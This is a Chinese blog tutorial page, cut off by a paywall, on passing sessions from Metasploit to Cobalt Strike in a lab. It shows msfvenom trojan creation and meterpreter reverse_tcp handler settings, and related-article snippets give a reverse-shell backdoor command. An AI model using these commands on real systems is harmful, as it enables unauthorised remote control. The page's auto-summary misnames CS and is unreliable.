内网渗透中metasploit与cs之间的会话转交

最新推荐文章于 2024-07-14 18:18:00 发布
最新推荐文章于 2024-07-14 18:18:00 发布
阅读量602 收藏 7
点赞数 12
文章标签: 服务器 网络 linux web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53829555/article/details/126818899
版权
本文详细介绍了在内网渗透过程中如何将Metasploit的会话转交给CS(Core Security)进行后续操作。通过在Kali Linux上创建木马文件、设置Apache2服务器、配置Metasploit的multi/handler模块,以及在CS中创建监听器和转接模块,最终实现两个工具间的会话转接。
摘要由CSDN通过智能技术生成

内网渗透中metasploit与cs之间的会话转交

`注:若有侵权请联系删除

目录

前言

在内网渗透中,metasploit与cs往往是联合使用的,其意义与重要性不言而喻,涉及到很多后期操作例如联合提权,那么其二者之间会话的转交就是这一切后期操作的根本了

这里监听机为kali2021.4版,靶机为win10

一、metasploit–>cs

1. 利用msfvenom创建一个木马文件ikun.exe在目录/var/www/html/下(方便靶机下载运行木马)

在这里插入图片描述

2. 开启Apache2

service apache2 start

3. 开启msfconsole并使用 exploit/multi/handler模块

use exploit/multi/handler/reverse_tcp

4. 查看配置并进行配置

4.1查看配置

show options

4.2配置监听端口(原来木马的生成端口)和本地监听地址(本机内网IP地址)及payload(木马生成payload)

set lport 8888
set lhost 192.168.43.75
set payload windows/meterpreter/reverse_tcp

在这里插入图片描述

最低0.47元/天 解锁文章
旖蔚安全实验室
关注
  • 12
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CS学习笔记】9、Metasploit框架
TeamsSix 的 CSDN 空间
06-19 557
0x00 客户端的漏洞利用 如果想使用MSF对目标进行漏洞利用,再通过这个漏洞来传输Beacon的话,也是可以的。 1、首先在MSF上选择攻击模块 2、接着在MSF上设置Payload为windows/meterpreter/reverse_http或者windows/meterpreter/reverse_https,这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。 3、之后在MSF设置Payload的LHOST、LPORT为CSBeacon的监听器IP及端口。 4、然后设置 Disab
CobaltStrike使用-第二篇(攻击模块、会话管理、CS-MSF联动)
Love&Share
11-30 2121
文章目录攻击用户驱动攻击用户截屏进程管理文件管理远程VNC浏览器代理用户发现&端口扫描视图会话管理会话传递相关命令CS派生会话CS派生MSF会话MSF木马->CS会话MSFexp->CS会话MSFsession派生到CS 攻击 当我们拿到Victim的Beacon之后就要进行攻击,CS提供了很多攻击模块,接下来介绍常见使用方法 用户驱动攻击 用户截屏 在目标选择屏幕截图即可获取截图,截图会在视图->屏幕截图显示 因为默认会话60秒返回一次,所以再执行操作60秒之后会得到.
cs木马制作与于远程控制
最新发布
2301_79580906的博客
07-14 384
cs木马制作与远控
渗透测试笔记】之【内网渗透——CS权限维持:CS上线后进程自迁移插件】
AA8j的博客
10-25 2844
1. 服务端加载malleable配置文件 1.1 下载 下载地址:https://github.com/threatexpress/malleable-c2 下载cs对应版本配置文件: 我这里下载4.3版本的。 1.2 加载配置文件 下载完后放入CS根目录: 加载配置文件启动方式,只需要在末尾跟上配置文件就可以了: ./teamserver 192.168.8.48 aa8j jquery-c2.4.3.profile 2. 客户端加载cna插件 2.1 插件下载 下载地址:https://git
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
ZL_1618的博客
06-14 2488
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Metasploit联动CobaltStrike渗透win11主机并提权
Locosomnus的博客
04-01 1792
算是一个学习记录吧,很菜,欢迎大佬的骂
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit 使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
**Metasploit渗透测试指南** 渗透测试是一种授权的安全测试,旨在发现并评估计算机网络和系统的弱点,以增强安全防御。Metasploit是一款广泛使用的开源工具,专为安全专业人士设计,用于执行这种测试。本指南将深入...
关于Metasploit Framework与渗透测试相关知识
12-28
**Metasploit Framework详解与渗透测试实践** 渗透测试是一种安全评估方法,通过模拟黑客攻击来检测系统的脆弱性。在这个过程Metasploit Framework扮演着核心工具的角色,它为安全专家提供了大量的漏洞利用代码...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf ...
内网渗透测试安全学习ppt
02-12
内网渗透测试是网络安全领域的一个重要环节,主要针对企业或组织内部网络进行的安全评估和漏洞检测。这个过程旨在模拟黑客的攻击行为,发现并修复安全漏洞,以保护关键信息和系统不受恶意攻击。以下是内网渗透测试...
利用Metasploit建立持续性会话后门
热门推荐
大方子
09-13 1万+
    环境Kali 1.0 IP:192.168.0.7windows 2003 IP:192.168.0.128本次文章 讲解Metasploit维持会话 建立服务后门首先先来生成一个 msf的exe后门     msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test....
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 6622
在这篇文章,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
渗透实战】木马免杀
zkaqlaoniao的博客
11-14 1608
base64 sgn编码。
Cobalt Strike(CS)流量分析
小千安全
04-21 7040
为了识别 Cobalt Strike 生成的 HTTPS 流量,可以收集不同 TLS 实现的 JA3S 值,构建 JA3S 签名库,并结合其他特征和行为进行综合分析和判断。同时,反编译CS的源代码也可以得知,92L对应于x86位的木马,而93L对应于x64位的后门。在 HTTPS 协议的 Client Hello 和 Server Hello 阶段,都包含了 JA3S 值传输过程过程会有 ja3,这个值在系统上是固定的,win10是一种的 但win11是另一种 他们取决于操作系统。
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 438
反弹端口型木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口,为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
第72天-内网安全-域横向 CS&MSF 联动及应急响应初
MCTSOG的博客
04-27 2737
思维导图 内网渗透 待续 应急响应 演示案例: MSF&CobaltStrike 联动 Shell (待续) 应急响应 攻击者可能拿到了哪些权限,攻击可能发生在哪个部分,从最可能的开始排查 可疑文件看文件有没有毒,有没有外部链接 结合攻击指搭建平台的漏洞 WEB 攻击应急响应朔源-后门,日志 故事回顾:某客户反应自己的网站首页出现篡改,请求支援 分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析 思路2
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4065
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上cs和msf 将cs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
Metasploit文指南:渗透测试与智能安全工具详解
导入目标设备是渗透测试的第一步,Metasploit提供了方法来探测网络的潜在目标。 5. **入侵基础原理**: 理解Metasploit的基本工作原理,包括如何利用漏洞、执行攻击和渗透目标系统。 6. **强力攻击**: 这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值